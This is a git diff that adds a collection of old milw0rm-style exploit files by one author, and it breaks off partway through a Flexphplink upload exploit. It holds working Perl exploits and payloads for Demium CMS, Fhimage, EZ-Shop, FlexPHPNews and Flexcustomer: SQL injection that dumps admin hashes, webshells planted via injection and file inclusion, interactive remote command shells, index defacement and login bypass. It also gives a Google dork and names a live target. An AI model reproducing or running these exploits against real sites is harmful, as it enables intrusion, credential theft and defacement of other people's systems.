/[path]/content.php + [CODE] + + [/CODE] + + In case of remote user's user and password cookies, the script will include GET data, simple Perl sploit at the end of the advisory. + +[/0x04] + + + +######### +Exploits section now. +#### + + +[$$ - Local File Inclusion Exploit] + +#!/usr/bin/perl + +# LFI Sploit +# by Osirys + +use IO::Socket; + +my $host = $ARGV[0]; + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +&exploit; + +sub exploit () { + print "\n[*] Include: "; + chomp($l_file = ); + + print "\n"; + $l_file !~ /exit/ || die "Exiting .."; + if ($l_file !~ /%00^/) { + $l_file = $l_file."%00"; + } + + my $url = $path."/content.php?include=".$l_file; + + my $data = "GET ".$url." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Cookie: login_user=p0wnin; login_pw=p0wnin\r\n". + "Content-Length: 0\r\n\r\n". + "\r\n"; + + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n"; + + $socket->send($data); + + my $count = 0; + while (my $e = <$socket>) { + $count++; + if ($count > 9) { + chomp($e); + print "$e\n"; + } + } + + &exploit; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.+)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.+)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub banner { + print "\n". + " --------------------------- \n". + " Demium CMS LFI sploit \n". + " by Osirys \n". + " --------------------------- \n\n"; +} + +sub help () { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad hostname! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +[/$$] + + + + + + + +[$$$ - Remote Command Execution Exploit via SQL Injection and Local File Inclusion (Works with mq Off)] + +#!/usr/bin/perl + +# RCE Exploit +# Step 1 => Creating a remote Shell in /tmp via SQL Injection +# Step 2 => Including via LFI remote Shell, executing your CMDs + +# by Giovanni Buzzin, Osirys + +# ---------------------------------------------------------------------------- +# Exploit in action [>!] +# ---------------------------------------------------------------------------- +# osirys[~]>$ perl sp1.txt http://localhost/demium_beta_v.0.2.1/ + +# --------------------------- +# Demium CMS RCE sploit +# (SQL-LFI) +# by Osirys +# --------------------------- + +# [*] Getting admin login details .. +# [$] User: admin +# [$] Pass: 5f4dcc3b5aa765d61d8327deb882cf99 + +# [*] Creating remote Shell via SQL Injection .. +# [*] Spawning remote Shell via LFI .. + +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pwd +# /home/osirys/web/demium_beta_v.0.2.1 +# shell[localhost]$> exit +# [-] Quitting .. + +# osirys[~]>$ +# ---------------------------------------------------------------------------- + +use IO::Socket; +use LWP::UserAgent; + +my $host = $ARGV[0]; +my $rand = int(rand 50); + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +print "[*] Getting admin login details ..\n"; + +my $url = $host."/tracking.php?follow_kat=osirys' union select concat(profile_username,0x3a,profile_password) from cms_profile order by '*"; +my $re = get_req($url); +if ($re =~ /replace\('\/(.+):(.+)\/.html/) { + $user = $1; + $pass = $2; + print "[\$] User: $user\n"; + print "[\$] Pass: $pass\n"; +} +else { + print "[-] Can't extract admin details\n\n"; +} + +print "\n[*] Creating remote Shell via SQL Injection ..\n"; + +my $code = ""; +my $file = "/tmp/sh_spawn_ownzzzzz".$rand.".txt"; +my $attack = $host."/tracking.php?follow_kat=osirys' union select '".$code."' into outfile '".$file; +get_req($attack); + +print "[*] Spawning remote Shell via LFI ..\n\n"; +&exploit; + +sub exploit { + my $file = "../../../../../../../../..".$file; + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + chomp($cmd = ); + $cmd !~ /exit/ || die "[-] Quitting ..\n\n"; + + my $url = $path."/content.php?include=".$file."%00&cmd=".$cmd; + + my $data = "GET ".$url." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Cookie: login_user=p0wnin; login_pw=p0wnin\r\n". + "Content-Length: 0\r\n\r\n". + "\r\n"; + + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n"; + + $socket->send($data); + + my @tmp_out; + my $stop; + while ((my $e = <$socket>)&&($stop != 1)) { + if ($e =~ /ExeCx0/) { + $stop = 1; + } + push(@tmp_out,$e); + } + + $stop == 1 || die "[-] Can't include remote Shell\n\n"; + + my $re = join '', @tmp_out; + my $content = tag($re); + if ($content =~ /0xExec(.+)\*ExeCx0/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exploit; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exploit; + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return($response->content); +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.+)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.+)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return($full_det); +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub banner { + print "\n". + " --------------------------- \n". + " Demium CMS RCE sploit \n". + " (SQL-LFI) \n". + " by Osirys \n". + " --------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad hostname! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +[/$$$] + +# milw0rm.com [2009-02-27] \ No newline at end of file diff --git a/EZ-Shop 1.02 - Lateral SQL Injection.txt b/EZ-Shop 1.02 - Lateral SQL Injection.txt new file mode 100644 index 0000000..03e3c1e --- /dev/null +++ b/EZ-Shop 1.02 - Lateral SQL Injection.txt @@ -0,0 +1,221 @@ +[Security Advisory Details: 14/04/2011] + +[Script] EZ-Shop 1.02 +[Location] http://www.fcsoftware.co.uk/index.php?page=opensource +[Vulnerability] SQL Injection +[Original Adv] http://y-osirys.com/security/exploits/id28 +[Author] Giovanni Buzzin, "Osirys" +[Site] y-osirys.com +[Contact] osirys[at]autistici[dot]org + +Greets to: stratsec,senseofsecurity + + +------------------------------------------------------------------------------------------------------------ +[CMS Description] + +EZ-Shop is a simple out of the box e-Commerce solution aimed at small startups and independant retailers +looking to get into online trade. The system was initially designed to be simple and easy to use but with +many features that more complex packages lack. + + + +------------------------------------------------------------------------------------------------------------ +[Security Flaw] + +EZ-Shop is prone to SQL Injection due to insufficent user supplied input sanization. + +[code:/specialoffer.php:line 249-283] + + + + + + select($sql); + if(count($resgid)>0) + { + for($p=0;$p"; + $prid=$resgid[$p]['intprodid']; + $sql6="select * from tblproddesc where intid='$prid'"; + $resprname1=$obj_db->select($sql6); + if(count($resprname1)>0) + { + $desc=$resprname1[0]['txtdesc']; + + $resprname1=$resprname1[0]['varprodname']; + + } + else + { + $resprname1=""; + } + $sql6="select * from tblproducts where intprodid='$prid'"; + + $resprname=$obj_db->select($sql6); + if(count($resprname)>0) + { + $proprice=$resprname[0]['decprice']; + ?> + + +
+ + + + + + +
Products
+ + + +[/code] + +This vulnerability is kind of weird, since is an SQL Injection injected through a column result of another SQL Injection. +The variable $speid comes from $_REQUEST, without being properly sanitized, here the Injection starts. + +QUERY 1: $sql="select * from tblprodgiftideas injectwhere intgiftideaid='$speid'"; + +The result of this Query is not showed on the screen, but is sent to another query: QUERY 2. + +QUERY 2: $sql6="select * from tblproddesc where intid='$prid'"; + +As we can see from this piece of code: + +[code] + $speid=$_REQUEST['specialid']; + $sql="select * from tblprodgiftideas where intgiftideaid='$speid'"; + $resgid=$obj_db->select($sql); + if(count($resgid)>0) + { + for($p=0;$p"; + $prid=$resgid[$p]['intprodid']; <---- prid + $sql6="select * from tblproddesc where intid='$prid'"; +[/code] + +This time the result of QUERY 2 is showed through : + + +So basically, what we need to do is to inject a query into QUERY 1 that will give back as a result another SQL Injection, injected +then into QUERY 2 through $prid. + +To do this, concat() mysql functions can become very helpful. Let's inject the second Injection as separator encrypted in hex. +Ex: concat(hex(SQL_PART1),something,hex(SQL_PART2)); +something could be: @@version +Since we don't want it to interfer with the Injection, we can comment it, updating the concat() in this way: + +SQL_PART1 : 1' union select 1,2,/* --> hex(SQL_PART1) = 0x312720756e696f6e2073656c65637420312c322c2f2a +something : @@version +SQL_PART" : */@@version,4,5# --> hex(SQL_PART2) = 0x2a2f404076657273696f6e2c342c3523 + +Concat will be: concat(0x312720756e696f6e2073656c65637420312c322c2f2a,@@version,0x2a2f404076657273696f6e2c342c3523) + +mysql> select concat(0x312720756e696f6e2073656c65637420312c322c2f2a,@@version,0x2a2f404076657273696f6e2c342c3523); ++-----------------------------------------------------------------------------------------------------+ +| concat(0x312720756e696f6e2073656c65637420312c322c2f2a,@@version,0x2a2f404076657273696f6e2c342c3523) | ++-----------------------------------------------------------------------------------------------------+ +| 1' union select 1,2,/*5.1.49-1ubuntu8.1*/@@version,4,5# | ++-----------------------------------------------------------------------------------------------------+ +1 row in set (0.00 sec) + +mysql> + +Here is the Second Injection: 1' union select 1,2,/*5.1.49-1ubuntu8.1*/@@version,4,5# + + +## Background Operation + +Injection 1 on QUERY 1: 1' union select 1,2,concat(0x312720756e696f6e2073656c65637420312c322c2f2a,@@vers + ion,0x2a2f404076657273696f6e2c342c3523)%23 +QUERY 1: select * from tblprodgiftideas where intgiftideaid='1' union select 1,2,concat(0 + x312720756e696f6e2073656c65637420312c322c2f2a,@@version,0x2a2f404076657273696f6e + 2c342c3523)#' + +Backend Injection 2 on QUERY 2: 1' union select 1,2,/*5.1.49-1ubuntu8.1*/@@version,4,5#' +QUERY 2: select * from tblproddesc where intid='1' union select 1 + ,2,/*5.1.49-1ubuntu8.1*/@@version,4,5#' + +(5.1.49-1ubuntu8.1 is commented in order to not interfer with our query) -> +-> union select 1,2,@@version,4,5 + +That will finally show through $resprname1 our @@version: 5.1.49-1ubuntu8.1 + + +SQL Inection p0c: + +/[cms path]/specialoffer.php?specialid=1' union select 1,2,concat(0x312720756e696f6e2073656c6563742031 +2c322c2f2a,@@version,0x2a2f404076657273696f6e2c342c3523)%23 + + +Since administrations details are stored in tbladmin table: +[tbladmin]:[intid,varadminfname,varadminname,varpassword,intstatus,varemail,ttLastLogginDate] + +Injection: + +SQL_PART1: 1' union select 1,2,/* + hex(SQL_PART1) = 0x312720756e696f6e2073656c65637420312c322c2f2a +something: @@version +SQL_PART1: */concat(0x3a,varadminname,0x3a,varpassword,0x3a,varemail,0x3a),4,5 from tbladmin# + hex(SQL_PART2) = 0x2a2f636f6e63617428307833612c76617261646d696e6e616d652 + c307833612c76617270617373776f72642c307833612c766172656d + 61696c2c30783361292c342c352066726f6d2074626c61646d696e23 + +concat(0x312720756e696f6e2073656c65637420312c322c2f2a,@@version,0x2a2f636f6e63617428 +307833612c76617261646d696e6e616d652c307833612c76617270617373776f72642c307833612c7661 +72656d61696c2c30783361292c342c352066726f6d2074626c61646d696e23) + +Final Injection: + +/specialoffer.php?specialid=1' union select 1,2,concat(0x312720756e696f6e2073656c65637 +420312c322c2f2a,@@version,0x2a2f636f6e63617428307833612c76617261646d696e6e616d652c3078 +33612c76617270617373776f72642c307833612c766172656d61696c2c30783361292c342c352066726f6d +2074626c61646d696e23)%23 + +That will show: + +:admin:21232f297a57a5a743894a0e4a801fc3:support@fcsoftware.co.uk: + + +-> Owned + + + +------------------------------------------------------------------------------------------------------------ +[Exploit] + +MySQL Version p0c: + +[p0c] + /[cms path]/specialoffer.php?specialid=1' union select 1,2,concat(0x312720756e696f6e2073656c65637 + 420312c322c2f2a,@@version,0x2a2f404076657273696f6e2c342c3523)%23 +[/p0c] + +Admin's details p0c: +[p0c] + /[cms_path]/specialoffer.php?specialid=1' union select 1,2,concat(0x312720756e696f6e2073656c65637 + 420312c322c2f2a,@@version,0x2a2f636f6e63617428307833612c76617261646d696e6e616d652c307833612c76617 + 270617373776f72642c307833612c766172656d61696c2c30783361292c342c352066726f6d2074626c61646d696e23)%23 +[/p0c] + + + +------------------------------------------------------------------------------------------------------------ +[Credits] + +Credit goes to Giovanni Buzzin, "Osirys" for the discover of this vulnerability. +(Meglio) + + + +------------------------------------------------------------------------------------------------------------ +[END: 14/04/2011] \ No newline at end of file diff --git a/Fhimage 1.2.1 - Remote Command Execution.pl b/Fhimage 1.2.1 - Remote Command Execution.pl new file mode 100644 index 0000000..17d7b34 --- /dev/null +++ b/Fhimage 1.2.1 - Remote Command Execution.pl @@ -0,0 +1,210 @@ +#!/usr/bin/perl + +# ----------------------------------------------------------------------------------------------- +# INFORMATIONS +# ----------------------------------------------------------------------------------------------- +# Fhimage 1.2.1 +# http://www.flash-here.com/downloads/download.php?id=9 +# Remote Command Execution Exploit (mq = Off) +# by Osirys +# osirys[at]live[dot]it +# osirys.org +# Thanks: x0r + +# !! => This exploit works only with: +# register_globals = On +# magic_quotes_gpc = Off + +# Google Dork: FhImage, powered by Flash-here.com +# Live : http://www.diandata.com/audi/photos/ + +# -------------------------------------------------------------- +# Exploit in action :D +# -------------------------------------------------------------- +# osirys[~]>$ perl rce.txt http://localhost/fhimage/ +# +# ---------------------------------------------- +# Fhimage Remote Command Execution Exploit +# Coded by Osirys +# [*] Needs Magic Quotes Off +# ---------------------------------------------- +# +# [+] Configuration file found ! +# [+] Injecting php vulnerable code .. +# [+] Injection succesfully ! +# [*] Hi my master, execute your commands ! +# +# shell[localhost]$> whoami +# apache +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> exit +# [-] Quitting .. +# osirys[~]>$ +# -------------------------------------------------------------- + + +use HTTP::Request; +use LWP::UserAgent; +use IO::Socket; + +my $conf_path = "/imgconfig/index.php?mode=write"; +my $rce_path = "/settings.php"; +my $evil_code = "Click+to+view+the+larger+image%27%3Bsystem%28%24_GET%5B%27cmd%27%5D%29%3B%24lol+%3D+%27aa"; + +my $host = $ARGV[0]; + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +$test_url = $host.$conf_path; +$test_re = get_req($test_url); + +if ($test_re !~ /Config Settings/) { + print "[-] Configuration file not found, or insufficent permissions \n"; + print "[-] Exploit failed ! \n"; + exit(0); +} +else { + print "[+] Configuration file found ! \n"; + + get_old_data($test_url); + my $url = $path.$conf_path; + + my $post = "g_title=" .$t. "&g_desc=".$evil_code. "&g_bgcolor=" .$g1."&g_titlecolor=".$g2."&g_". + "desccolor=".$g3."&g_textcolor=".$g4."&g_linkcolor=".$g5."&g_vlinkcolor=".$g6."&g_c". + "ols=".$g7."&g_rows=".$g8."&g_thumb_worh=".$g9."&g_twidth=".$g10."&g_spacing=". $g11. + "&g_dispFn=check&g_sortByFn=check&g_insensitive_sort=check&g_folderImg=&g_popupWidt". + "h=400&g_popupHeight=400"; + + my $length = length($post); + + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n"; + + my $data = "POST ".$url." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". + $post."\r\n"; + + print "[+] Injecting php vulnerable code ..\n"; + $socket->send($data); + + while ((my $e = <$socket>)&&($inj_t != 1)) { + if ($e =~ /Settings Saved/) { + print "[+] Injection succesfully !\n"; + print "[*] Hi my master, execute your commands !\n\n"; + $inj_t = 1; + } + } + + $inj_t == 1 || die "[-] Unable to inject php code ! \n"; + + my $re = get_req($host."/imgconfig/index.php"); + if ($re =~ /g_desc" size="50" value="Click to view the larger image';system\(\$_GET\['cmd']\);\$lol = 'aa">/) { + print "[+] Magic Quotes are ON. Exploit Failed\n\n"; + exit(0); + } + &exec_cmd; +} + +sub exec_cmd { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = ($host.$rce_path."?cmd=".$cmd); + $re = get_req($exec_url); + if ($re =~ /(.*)/) { + my $cmd = $1; + print "$cmd\n"; + &exec_cmd; + } + else { + print "[-] Undefined output or bad cmd !\n"; + &exec_cmd; + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub get_old_data() { + my $url = $_[0]; + my $re = &get_req($url); + if ($re =~ /name="g_title" size="50" value="(.*)">/) { $t = $1; } + if ($re =~ /g_bgcolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g1 = "\%23".$1; } + if ($re =~ /g_titlecolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g2 = "\%23".$1; } + if ($re =~ /g_desccolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g3 = "\%23".$1; } + if ($re =~ /g_textcolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g4 = "\%23".$1; } + if ($re =~ /g_linkcolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g5 = "\%23".$1; } + if ($re =~ /g_vlinkcolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g6 = "\%23".$1; } + if ($re =~ /g_cols" cols="50" value="([0-9]{1,3})"> /) { $g7 = $1; } + if ($re =~ /g_rows" cols="50" value="([0-9]{1,3})"> /) { $g8 = $1; } + if (($re =~ /g_thumb_worh" type="radio" value="w" checked >/)&&($re =~ /g_twidth" cols="50" value="([0-9]{1,5})">/)) { ($g9,$g10) = ("w",$1); } + if (($re =~ /g_thumb_worh" type="radio" value="h" checked >/)&&($re =~ /g_twidth" cols="50" value="([0-9]{1,5})">/)) { ($g9,$g10) = ("h",$1); } + if ($re =~ /g_spacing" type="text" id="g_spacing" value="([0-9]{1,5})">/) { $g11 = $1; } +} + +sub banner { + print "\n". + " ---------------------------------------------- \n". + " Fhimage Remote Command Execution Exploit \n". + " Coded by Osirys \n". + " [*] Needs Magic Quotes Off \n". + " ---------------------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad hostname! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-01-19] \ No newline at end of file diff --git a/Fhimage 1.2.1 - Remote Index Change.pl b/Fhimage 1.2.1 - Remote Index Change.pl new file mode 100644 index 0000000..bed1358 --- /dev/null +++ b/Fhimage 1.2.1 - Remote Index Change.pl @@ -0,0 +1,176 @@ +#!/usr/bin/perl + +# ----------------------------------------------------------------------------------------------- +# INFORMATIONS +# ----------------------------------------------------------------------------------------------- +# Fhimage 1.2.1 +# http://www.flash-here.com/downloads/download.php?id=9 +# Remote Index Change Exploit +# by Osirys +# osirys[at]live[dot]it +# osirys.org +# Thanks: x0r + +# With this exploit, you will able to change index.php content + +## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY +## # IMPROPERLY USE OF THIS EXPLOIT. USE IT AT YOUR OWN RISK !! + +# Google Dork: FhImage, powered by Flash-here.com + + +use HTTP::Request; +use LWP::UserAgent; +use IO::Socket; + +my $conf_path = "/imgconfig/index.php?mode=write"; +my $index_PATH = "/index.php"; + + +my $host = $ARGV[0]; +my $string_to_inj = $ARGV[1]; + +(($host)&&($string_to_inj)) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +$test_url = $host.$conf_path; +$test_re = get_req($test_url); + +if ($test_re !~ /Config Settings/) { + print "[-] Configuration file not found, or insufficent permissions \n"; + print "[-] Exploit failed ! \n"; + exit(0); +} +else { + print "[+] Configuration file found ! \n"; + + get_old_data($test_url); + my $url = $path.$conf_path; + + my $post = "g_title=".$t."&g_desc=".$string_to_inj."&g_bgcolor=".$g1."&g_titlecolor=".$g2."&g_". + "desccolor=".$g3."&g_textcolor=".$g4."&g_linkcolor=".$g5."&g_vlinkcolor=".$g6."&g_c". + "ols=".$g7."&g_rows=".$g8."&g_thumb_worh=".$g9."&g_twidth=".$g10."&g_spacing=". $g11. + "&g_dispFn=check&g_sortByFn=check&g_insensitive_sort=check&g_folderImg=&g_popupWidt". + "h=400&g_popupHeight=400"; + + my $length = length($post); + + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n"; + + my $data = "POST ".$url." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". + $post."\r\n"; + + print "[+] Chaning index content ..\n"; + $socket->send($data); + + while ((my $e = <$socket>)&&($inj_t != 1)) { + if ($e =~ /Settings Saved/) { + $inj_t = 1; + } + } + + $inj_t == 1 || die "[-] Unable to change index content ! \n"; + &expl_cheek; +} + +sub expl_cheek { + my $url = $host.$index_PATH; + my $re = get_req($url); + if ($re =~ /class="desc">$string_to_inj<\/div>/) { + print "[+] Exploit succesfull !\n"; + print "[+] Index changed, go and have a look !\n"; + exit(0); + } + else { + print "[-] Exploit failed\n"; + print "[?] Something went wrong\n"; + exit(0); + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub get_old_data() { + my $url = $_[0]; + my $re = &get_req($url); + if ($re =~ /name="g_title" size="50" value="(.*)">/) { $t = $1; } + if ($re =~ /g_bgcolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g1 = "\%23".$1; } + if ($re =~ /g_titlecolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g2 = "\%23".$1; } + if ($re =~ /g_desccolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g3 = "\%23".$1; } + if ($re =~ /g_textcolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g4 = "\%23".$1; } + if ($re =~ /g_linkcolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g5 = "\%23".$1; } + if ($re =~ /g_vlinkcolor'\)" cols="7" maxlength="7" value="#([0-9a-zA-Z]{6})">/) { $g6 = "\%23".$1; } + if ($re =~ /g_cols" cols="50" value="([0-9]{1,3})"> /) { $g7 = $1; } + if ($re =~ /g_rows" cols="50" value="([0-9]{1,3})"> /) { $g8 = $1; } + if (($re =~ /g_thumb_worh" type="radio" value="w" checked >/)&&($re =~ /g_twidth" cols="50" value="([0-9]{1,5})">/)) { ($g9,$g10) = ("w",$1); } + if (($re =~ /g_thumb_worh" type="radio" value="h" checked >/)&&($re =~ /g_twidth" cols="50" value="([0-9]{1,5})">/)) { ($g9,$g10) = ("h",$1); } + if ($re =~ /g_spacing" type="text" id="g_spacing" value="([0-9]{1,5})">/) { $g11 = $1; } +} + +sub banner { + print "\n". + " ----------------------------------------- \n". + " Fhimage Remote Index Change Exploit \n". + " Coded by Osirys \n". + " [*] The author is not responsable \n". + " of any violation \n". + " ----------------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad hostname or missing string to inject! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path string_to_inject\n\n"; + exit(0); +} + +# milw0rm.com [2009-01-19] \ No newline at end of file diff --git a/FlexPHPNews 0.0.6 PRO - Authentication Bypass.txt b/FlexPHPNews 0.0.6 PRO - Authentication Bypass.txt new file mode 100644 index 0000000..76d7bdd --- /dev/null +++ b/FlexPHPNews 0.0.6 PRO - Authentication Bypass.txt @@ -0,0 +1,42 @@ +[START] + +######################################################################################### +[0x01] Informations: + +Script : FlexPHPNews PRO 0.0.6 +Script : FlexPHPNews 0.0.6 +Download : http://www.hotscripts.com/jump.php?listing_id=24219&jump_type=1 [0.0.6 Pro] +Download : http://www.hotscripts.com/jump.php?listing_id=22130&jump_type=1 [0.0.6] +Vulnerability : Sql Injection (Auth bypass) +Author : Osirys +Contact : osirys[at]live[dot]it +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay, str0ke + +######################################################################################### +[0x02] Bug:[Sql Injection (Auth bypass)] +###### + +Bugged file is: /[path]/admin/usercheck.php + +[CODE] + +if (!empty($logincheck)){ +$sql = "select username,adminid from newsadmin where username='$checkuser' and password='$checkpass'"; +$results = $db->select($sql); + +[/CODE] + + +[!] EXPLOIT DETAILS: + + [1] Go to /[path]/admin/index.php + [2] Put as username and password the following sql code: ' or '1=1 + [3] You are the admin now, bypass succesfull =) + +######################################################################################### + +[/END] + +# milw0rm.com [2008-12-14] + \ No newline at end of file diff --git a/Flexcustomer 0.0.6 - Admin Authentication Bypass Possible PHP Code Writing.txt b/Flexcustomer 0.0.6 - Admin Authentication Bypass Possible PHP Code Writing.txt new file mode 100644 index 0000000..903f654 --- /dev/null +++ b/Flexcustomer 0.0.6 - Admin Authentication Bypass Possible PHP Code Writing.txt @@ -0,0 +1,56 @@ +[START] + +#################################################################################################################### +[0x01] Informations: + +Script : Flexcustomer +Download : http://www.hotscripts.com/jump.php?listing_id=25331&jump_type=1 +Vulnerability : Admin Login Bypass / Possible PHP code writing +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org + + +#################################################################################################################### +[0x02] Bug: [Admin Login Bypass] +###### + +Bug: /[path]/admin/usercheek.php + +[CODE] + +select($sql); + +[/CODE] + +[!FIX] Escape $checkuser and $checkpass in $sql query. + + +[!] EXPLOIT: /[path]/admin/ + Put as username and password: ' or '1=1 + You will log in as admin + +#################################################################################################################### +[0x03] Bug: [Possible PHP data writing] +###### + +This is not a real bug, but could become it if the administrator doesn't delete the install.php file. +In fact, data that we put in /[path]/admin/install.php forms will be save in a .php file. +So, if install.php is not deleted, we can inject php code, and this bug can become a RCE vulnerability. + +[!] EXPLOIT: + 1) Go at: /[path]/admin/install.php + 2) Put as Database Name this simple PHP code: ";system($_GET['cmd']);$a = "k + 3) Fill the other form and press Next + 4) Execute your cmd: /[path]/const.inc.php?cmd=id + +#################################################################################################################### + +[/END] + +# milw0rm.com [2008-12-29] \ No newline at end of file diff --git a/Flexphplink Pro - Arbitrary File Upload.pl b/Flexphplink Pro - Arbitrary File Upload.pl new file mode 100644 index 0000000..efff1d8 --- /dev/null +++ b/Flexphplink Pro - Arbitrary File Upload.pl @@ -0,0 +1,215 @@ +#!/usr/bin/perl + +# HAPPY CHRISTMAS !! +# Flexphplink Pro +# http://www.hotscripts.com/jump.php?listing_id=21062&jump_type=1 +# Bug: Arbitrary File Upload +# * I coded this exploit just for fun ;) +# Exploit coded by Osirys +# osirys[at]live[dot]it +# http://osirys.org +# Greets: x0r, miclen, emgent, str0ke, Todd and AlpHaNiX + +# Example: +# osirys[~]>$ perl exp.txt http://localhost/flexphplinkproen/ +# ============================ +# Flexphplink Pro Exploit +# Coded by Osirys +# osirys[at]live[dot]it +# Proud to be italian +# ============================ +# [+] http://localhost/flexphplinkproen/ backdoored, just type your choise: +# 1 - 